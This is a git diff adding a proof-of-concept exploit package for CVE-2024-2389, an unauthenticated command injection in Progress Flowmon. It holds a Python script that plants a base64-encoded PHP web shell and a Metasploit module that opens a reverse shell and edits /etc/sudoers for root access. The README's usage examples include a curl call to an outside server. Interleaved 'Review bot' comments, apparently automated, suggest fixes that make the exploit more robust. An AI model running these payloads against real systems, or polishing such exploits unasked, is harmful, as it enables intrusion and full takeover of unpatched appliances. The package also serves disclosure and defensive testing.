diff --git a/CVE-2024-2389/CVE-2024-2389.py b/CVE-2024-2389/CVE-2024-2389.py
new file mode 100644
index 0000000..3758eb6
--- /dev/null
+++ b/CVE-2024-2389/CVE-2024-2389.py
@@ -0,0 +1,26 @@
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description='Progress Flowmon RCE')
+parser.add_argument('target', type=str, help='Target URL')
+parser.add_argument('--cmd', type=str, help='Blind command to run', required=False)
+parser.add_argument('--web-shell', action='store_true', help='Show command output')
+args = parser.parse_args()
+target = args.target
+cmd = args.cmd
+
+if args.web_shell:
+    print("[+] Writing webshell to /var/www/shtml/rce.php")
+    url = f"{target}/service.pdfs/confluence?file=userguide&lang=x&pluginPath=$(echo+PD9waHAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7c3lzdGVtKCRfR0VUWydjbWQnXSk7fT8%2b+|+base64+-d+>/var/www/shtml/rce.php)"
+elif args.cmd:
+    print("[+] Running command")
+    url = f"{target}/service.pdfs/confluence?file=x&lang=x&pluginPath=$({cmd})"
+try:
+    requests.get(url, verify=False, timeout=1) # Time it out because sometimes the command will execute but the parent process hangs
+except requests.exceptions.ReadTimeout or requests.exceptions.ConnectTimeout:
+    pass
+
+if args.web_shell:
+    print(f"[+] Visit {target}/rce.php?cmd=ls")
diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md
new file mode 100644
index 0000000..9f3749a
--- /dev/null
+++ b/CVE-2024-2389/README.md
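Review bot: The `except` clause near the end of the hunk catches only `ReadTimeout`: the expression `requests.exceptions.ReadTimeout or requests.exceptions.ConnectTimeout` evaluates to the first class object, so a connect timeout still escapes as a traceback. The common base class covers both, `except requests.exceptions.Timeout:`, or spell out a tuple `except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout):`. Separately, when neither `--web-shell` nor `--cmd` is given, `url` is never bound and `requests.get(url, ...)` raises `NameError`; an `else: parser.error('one of --cmd or --web-shell is required')` branch after the `elif` turns that into a usage message. The trailing comment on the `requests.get` line explains the short timeout well; a one-line module docstring naming the CVE and pointing at the README would make the script self-describing.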
@@ -0,0 +1,25 @@
+# CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection
+
+## Information
+**Description:** This exploits an unauthenticated command injection in the Progress Software Flowmon application.
+**Versions Affected:** Tested on v12.03.02
+**Version Fixed:** 12.3.5/11.1.14
+**Researcher:** Dave Yesland (https://x.com/daveysec)
+**Disclosure Link:** https://rhinosecuritylabs.com/
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389
+**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+## Proof-of-Concept Exploit
+### Description
+This exploit a command injection flaw in an unauthenticated PDF generator endpoint affecting PdfGenerator.php.
+
+### Usage/Exploitation
+To run a blind command:
+`python3 CVE-2024-2389 --cmd 'curl a.server' TARGET`
+
+To write a simple webshell:
+`python3 CVE-2024-2389 --web-shell TARGET`
+Then visit TARGET/rce.php
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)
\ No newline at end of file
diff --git a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb b/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb
new file mode 100644
index 0000000..851b9fe
--- /dev/null
+++ b/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb
@@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Flowmon Unauthenticated Command Injection', + 'Description' => %q{ + This module exploits an unauthenticated command injection vulnerability in Progress Flowmon + versions before v12.03.02. + }, + 'Author' => [ + 'Dave Yesland with Rhino Security Labs', # Vulnerability discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', 'CVE-2024-2389'], + ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] + ], + 'DisclosureDate' => '2024', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp', + 'SSL' => true, + 'RPORT' => 443 + }, + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']), + OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true]) + ]) + end + + def execute_command(cmd) + send_request_cgi( + 'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'), + 'method' => 'GET', + 'vars_get' => { + 'file' => 'x', + 'lang' => 'x', + 'pluginPath' => "$(#{cmd})" + } + ) + end + + def exploit + print_status('Attempting to execute payload...') + execute_command(payload.encoded) + end + + def on_new_session(session) + if datastore['PRIVESC'] + execute_privesc_command(session) + 
else + print_status('Privilege escalation skipped.') + end + end + + def execute_privesc_command(session) + print_status("Executing privilege escalation command...") + session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;') + session.shell_command('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;') + session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;') + session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;') + print_status('You should be able to use "sudo -i" for a root shell...') + end + + def check + print_status("Checking if #{peer} can be exploited!") + + uri = normalize_uri(target_uri.path, 'homepage/auth/login') + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET' + ) + + unless res + print_error("Connection failed") + return CheckCode::Unknown + end + + # Use a regular expression to extract the version number from the response + version = res.body.match(/\/favicon\.ico\?v=([\d.]+)/) + + unless version && version[1] + print_error("Unable to determine the version from the favicon link.") + return CheckCode::Unknown + end + + print_status("Detected version: #{version[1]}") + + if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02') + print_good("Version #{version[1]} is vulnerable.") + return CheckCode::Vulnerable + else + print_error("Version #{version[1]} is not vulnerable.") + return CheckCode::Safe + end + end + end \ No newline at end of file diff --git a/CVE-2024-2389/poc_image.png b/CVE-2024-2389/poc_image.png new file mode 100644 index 0000000..4a17b1e --- /dev/null +++ b/CVE-2024-2389/poc_image.png @@ -0,0 +1 @@ +This should be an image showing the successful exploit \ No newline at end of file diff --git a/README.md b/README.md index a8e1f46..297fbbd 100644 --- a/README.md +++ b/README.md 
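Review bot: `'DisclosureDate' => '2024'` in `initialize` is not a full date; Metasploit module metadata expects the `YYYY-MM-DD` form, so this should carry the actual disclosure day (placeholder `'2024-MM-DD'` until it is filled in). The `Description` text says the module targets "versions before v12.03.02", which disagrees both with the README added in this same commit ("Tested on v12.03.02", fixed in 12.3.5/11.1.14) and with `check`, which reports `12.03.02` itself as vulnerable; the description should be aligned with the vendor advisory already listed under `References`. In `execute_privesc_command` the `echo` argument appears truncated in this rendering (the PHP open tag is missing before `> /etc/sudoers"); ?>`), so I cannot confirm the string is intact; since that method rewrites `/var/www/shtml/index.php` and writes to `/etc/sudoers`, `SideEffects` should also list `CONFIG_CHANGES` next to `ARTIFACTS_ON_DISK`. Minor style: `print_status("Executing privilege escalation command...")` and `print_error("Connection failed")` use double quotes without interpolation while the rest of the file uses single quotes.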
@@ -2,6 +2,7 @@
 A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs.
 * [CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster](CVE-2024-2449/)
 * [CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-2448/)
+* [CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection](CVE-2024-2389/)
 * [CVE-2024-23724: Ghost CMS Stored XSS Leading to Owner Takeover](CVE-2024-23724/)
 * [CVE-2024-1212: Unauthenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-1212/)
 * [CVE-2023-47327: Silverpeas Core Space Create Function is vulnerable to Broken Access Control](CVE-2023-47327/)